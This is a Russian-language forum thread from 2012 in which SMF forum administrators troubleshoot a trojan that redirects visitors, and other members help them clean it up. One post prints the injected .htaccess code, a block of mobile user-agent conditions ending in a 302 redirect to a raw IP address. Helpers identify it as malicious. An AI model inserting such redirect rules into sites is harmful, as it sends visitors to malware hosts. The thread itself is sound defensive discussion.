Странный троян на форуме

Автор Мэл, 09 мая 2012, 13:51:22

« назад - далее »

0 Пользователи и 1 гость просматривают эту тему.

Мэл

Всем привет.
На форуме бесчинствует троян.
Через cPanel я проверил полную проверку home директории, уничтожил всё, что можно, в .ftpaccess выставил только свой IP, но в SMF проблема по-прежнему присутствует. При попытке перехода на меню форума идёт редирект куда-то на левый сайт, в результате оказываемся на странице поиска Google. Все .php файлы просмотрел, ничего подозрительного не нашёл (но и упустить мог, с другой стороны). Установлен мод Forum Firewall.
Не подскажите, где смотреть и что делать?
Или только полный бэкап всё решит?
Спасибо.

UPD:
В коренном .htaccess были редиректы - удалил. Все остальные чистые. Проблема не исчезла...
"Great spirits have often encountered violent opposition from weak minds" - Albert Einstein

Mr. Anviss

AcidMan Качественно вы почистили форум.
Connection Problems
Sorry, SMF was unable to connect to the database. This may be caused by the server being busy. Please try again later.

Xansen

доступ к форуму скинь в личку, посмотрю "горячие уязвимые файлы"...
P.S: проверяй также файлы в папке SCRIPTS твоего активного шаблона форума, особенно файл script.js

Мэл

Цитата: Mr. Anviss от 09 мая 2012, 16:12:06
AcidMan Качественно вы почистили форум.
Connection Problems
Sorry, SMF was unable to connect to the database. This may be caused by the server being busy. Please try again later.
Вижу.
После чистки этого не было на протяжении пары часов.
"Great spirits have often encountered violent opposition from weak minds" - Albert Einstein

Мэл

Цитата: Xansen от 09 мая 2012, 20:30:26
доступ к форуму скинь в личку, посмотрю "горячие уязвимые файлы"...
P.S: проверяй также файлы в папке SCRIPTS твоего активного шаблона форума, особенно файл script.js
Какой именно доступ?
В папке scripts лежит только script.js, без понятия как его проверять.
"Great spirits have often encountered violent opposition from weak minds" - Albert Einstein

Xansen

Цитата: AcidMan от 09 мая 2012, 22:28:42В папке scripts лежит только script.js, без понятия как его проверять.
ручками, открываешь файл и ищешь подозрительный код. Если интересно пиши в аську завтра: постараюсь помочь.

remingtone

закрой возможность загружать аватары и файлы извне, и проверь папку аватаров антивирусом по всей строгости.

Мэл

Цитата: Xansen от 10 мая 2012, 04:33:58
ручками, открываешь файл и ищешь подозрительный код. Если интересно пиши в аську завтра: постараюсь помочь.
Ок, спасибо.
Цитата: okk от 10 мая 2012, 07:35:36
закрой возможность загружать аватары и файлы извне, и проверь папку аватаров антивирусом по всей строгости.
Это я в первую очередь сделал :)
"Great spirits have often encountered violent opposition from weak minds" - Albert Einstein

Мэл

Сделан откат на 7 дней, вроде всё заработало.
Был обнаружен троян в файле licenses.php (которого там вообще быть не должно).
Вроде работает.
Что посоветуете для усиления защиты?
"Great spirits have often encountered violent opposition from weak minds" - Albert Einstein

GeorG

Проверить свой компьютер с обновленной базой антивируса, после поменяйте пароли на фтп и панель управления сервером (именно в этой последовательности). Если есть у кого-то доступ к фтп кроме вас, скажите им чтобы они тоже проверили себя на вирусы. Ну или не давайте доступ "кому-то" ещё.

Цитата: AcidMan от 10 мая 2012, 15:45:39Что посоветуете для усиления защиты?
Ну ещё наверно , не лазить по "левым" сайтам.
Верстка тем по шаблону, их доработка/переработка, переделка тем с версии smf 1.1 на smf 2.0. Примеры работ - insidestyle.ru
Установка модов (заточка под ваш форум); Моды под заказ; Обновление форума; Правильный перенос; Удаление/лечение вирусов; Устранения ошибок.
Обращаться в ЛС
Мой форум
Модуль анти-спама CleanTalk, сам пользуюсь
Сервера которыми сам пользуюсь - cadedic.ru

Мэл

Цитата: GeorG от 10 мая 2012, 16:23:39
Проверить свой компьютер с обновленной базой антивируса, после поменяйте пароли на фтп и панель управления сервером (именно в этой последовательности). Если есть у кого-то доступ к фтп кроме вас, скажите им чтобы они тоже проверили себя на вирусы. Ну или не давайте доступ "кому-то" ещё.
Ну еще наверно ещё, не лазить по "левым" сайтам.

Это всё сделано. Никаких левых сайтов тем более.
И в .ftpaccess стоит только мой IP.
"Great spirits have often encountered violent opposition from weak minds" - Albert Einstein

Xansen

Цитата: AcidMan от 10 мая 2012, 16:25:13И в .ftpaccess стоит только мой IP.
значит сломали через криво настроенные права на запись или дырку в каком нибудь моде или через соседа (если они есть)

Мэл

Цитата: Xansen от 11 мая 2012, 09:53:00
значит сломали через криво настроенные права на запись или дырку в каком нибудь моде или через соседа (если они есть)
Фашизм с одним моим IP я ввёл после :)
"Great spirits have often encountered violent opposition from weak minds" - Albert Einstein

vniif

Второй день мучаюсь с аналогичной проблемой-
при заходе на сайт через мобильные устройства и Ipad, выходит сайт с переадресацией и спредложением поменять броузер...
Найти до сих пор не могу:((


Мэл

Цитата: vniif от 11 мая 2012, 14:24:47
Второй день мучаюсь с аналогичной проблемой-
при заходе на сайт через мобильные устройства и Ipad, выходит сайт с переадресацией и спредложением поменять броузер...
Найти до сих пор не могу:((
Откат сделай как я.
"Great spirits have often encountered violent opposition from weak minds" - Albert Einstein

vniif

да  не особо хочется, так как с компа все ок и форум проработал пару дней в рабочем режиме:((
Обращался на хостинг, что бы они прочесали , но ничего не нашли..((

Мэл

Цитата: vniif от 11 мая 2012, 14:33:10
да  не особо хочется, так как с компа все ок и форум проработал пару дней в рабочем режиме:((
Обращался на хостинг, что бы они прочесали , но ничего не нашли..((
У тебя в cPanel от хоста есть скан на вирусы? Мне мой помог, хотя бы отчасти.
И ещё обрати внимание на наличие в директории форума вирусного файла licenses.php.
"Great spirits have often encountered violent opposition from weak minds" - Albert Einstein

vniif

Еще вчера стал искать его, не нашел...
В самой панели нет, там идет проверка с переодичностью в 5 дней..
Вообщем засада какая то..

vniif

что за файл .vimrc ??? есть ли ему место в smf?

Xansen

у тебя скорее всего в файле .htaccess дело. Посмотри его содержимое

vniif

^))))
FFFFFFFFFFFFFFАААААААА))
RewriteCond %{HTTP_USER_AGENT} !download [NC]
RewriteCond %{HTTP_USER_AGENT} !windows-media-player [NC]
RewriteRule ^(.*)$ http://91.224.161.175/go/1/ [L,R=302]

И что с это строкой сделать?? (с последней я имею ввиду) удалить и все дела??

Xansen

Вот тебе и ответ на твой вопрос! Удаляй все 3

vniif

Удалил последнею, всю заработало..Больше ничего не нашел ..
Есть ли смысл редактировать .htaccess  :
ErrorDocument 404 /index.php
###AB.PROTECTION###
RewriteEngine on
RewriteCond %{HTTP_ACCEPT} "text/vnd.wap.wml|application/vnd.wap.xhtml+xml" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "acs|alav|alca|amoi|audi|aste|avan|benq|bird|blac|blaz|brew|cell|cldc|cmd-" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "dang|doco|eric|hipt|inno|ipaq|java|jigs|kddi|keji|leno|lg-c|lg-d|lg-g|lge-" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "maui|maxo|midp|mits|mmef|mobi|mot-|moto|mwbp|nec-|newt|noki|opwv" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "palm|pana|pant|pdxg|phil|play|pluc|port|prox|qtek|qwap|sage|sams|sany" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "sch-|sec-|send|seri|sgh-|shar|sie-|siem|smal|smar|sony|sph-|symb|t-mo" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "teli|tim-|tosh|tsm-|upg1|upsi|vk-v|voda|w3cs|wap-|wapa|wapi" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "wapp|wapr|webc|winw|winw|xda|xda-" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "up.browser|up.link|windowssce|iemobile|mini|mmp" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "symbian|midp|wap|blackberry|j2me|smartphone|series|phone|pocket|mobile|pda|psp|PPC|Android" [NC]
RewriteCond %{HTTP_USER_AGENT} !macintosh [NC]
RewriteCond %{HTTP_USER_AGENT} !america [NC]
RewriteCond %{HTTP_USER_AGENT} !avant [NC]
RewriteCond %{HTTP_USER_AGENT} !download [NC]
RewriteCond %{HTTP_USER_AGENT} !windows-media-player [NC]

Xansen

Цитата: vniif от 12 мая 2012, 08:17:24
RewriteCond %{HTTP_ACCEPT} "text/vnd.wap.wml|application/vnd.wap.xhtml+xml" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "acs|alav|alca|amoi|audi|aste|avan|benq|bird|blac|blaz|brew|cell|cldc|cmd-" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "dang|doco|eric|hipt|inno|ipaq|java|jigs|kddi|keji|leno|lg-c|lg-d|lg-g|lge-" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "maui|maxo|midp|mits|mmef|mobi|mot-|moto|mwbp|nec-|newt|noki|opwv" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "palm|pana|pant|pdxg|phil|play|pluc|port|prox|qtek|qwap|sage|sams|sany" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "sch-|sec-|send|seri|sgh-|shar|sie-|siem|smal|smar|sony|sph-|symb|t-mo" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "teli|tim-|tosh|tsm-|upg1|upsi|vk-v|voda|w3cs|wap-|wapa|wapi" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "wapp|wapr|webc|winw|winw|xda|xda-" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "up.browser|up.link|windowssce|iemobile|mini|mmp" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "symbian|midp|wap|blackberry|j2me|smartphone|series|phone|pocket|mobile|pda|psp|PPC|Android" [NC]
RewriteCond %{HTTP_USER_AGENT} !macintosh [NC]
RewriteCond %{HTTP_USER_AGENT} !america [NC]
RewriteCond %{HTTP_USER_AGENT} !avant [NC]
RewriteCond %{HTTP_USER_AGENT} !download [NC]
RewriteCond %{HTTP_USER_AGENT} !windows-media-player [NC]

вот это всё кусок редиректа на вирус

remingtone

интересно другое: как его изменили? :)

GeorG

Верстка тем по шаблону, их доработка/переработка, переделка тем с версии smf 1.1 на smf 2.0. Примеры работ - insidestyle.ru
Установка модов (заточка под ваш форум); Моды под заказ; Обновление форума; Правильный перенос; Удаление/лечение вирусов; Устранения ошибок.
Обращаться в ЛС
Мой форум
Модуль анти-спама CleanTalk, сам пользуюсь
Сервера которыми сам пользуюсь - cadedic.ru

remingtone

это вопрос к тому, что надо устранить возможность повторного взлома

vniif

Согласен...Предохраняться, предохраняться и еще раз)))
Я подцепил эту штуку, один раз воспользовавшись компом друга в Питере..:))
Как я понял, смысла переходить на smf 2.0 нет?

Xansen

Смотря что для тебя смысл... Я бы на твоем месте хотя бы до 1.1.16 обновился:)

vniif

да это давно сделано...........в день выхода 1,1,16
в смысле прорех в безопасности

remingtone

я бы перешел на 2.0.2. хотя двойка и не панацея, но она надежнее